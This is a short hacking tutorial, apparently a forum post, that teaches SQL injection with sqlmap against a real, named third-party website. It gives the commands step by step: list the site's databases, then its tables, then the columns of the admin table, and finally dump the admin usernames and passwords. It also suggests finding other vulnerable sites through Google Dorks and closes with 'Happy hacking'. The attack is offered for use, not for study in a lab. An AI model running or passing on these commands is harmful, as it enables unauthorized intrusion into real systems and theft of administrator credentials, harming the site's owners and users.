Everyone who want to learn Hacking, he must have knowledge about sqlmap & site vulnerabilty.
Requirements :-
Requirements :-
Python27 or Sqlmap and sqli vulnerability website
if you don't have any vulnerability site using Google Dorks
if you don't have any vulnerability site using Google Dorks
Lets start Open you terminal and run sqlmap
Now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 --dbs" without quotes and hit enter
(--db = Database)
you can see this we got 2 databses
[*] c2deuts_ice
[*] information_schema
now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D c2deuts_ice --tables" without quotes (-D mean database name and )
We got 25 tables but we need only admin table
now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D c2deuts_ice -T admin --columns" without quotes (-T put table name )
you can see this we got admin usernames and passwords for get password type follow commands
"sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D c2deuts_ice -T admin -C username,password --dump" without quotes
you can see this wo got admin users and password
Enjoy Happy hacking
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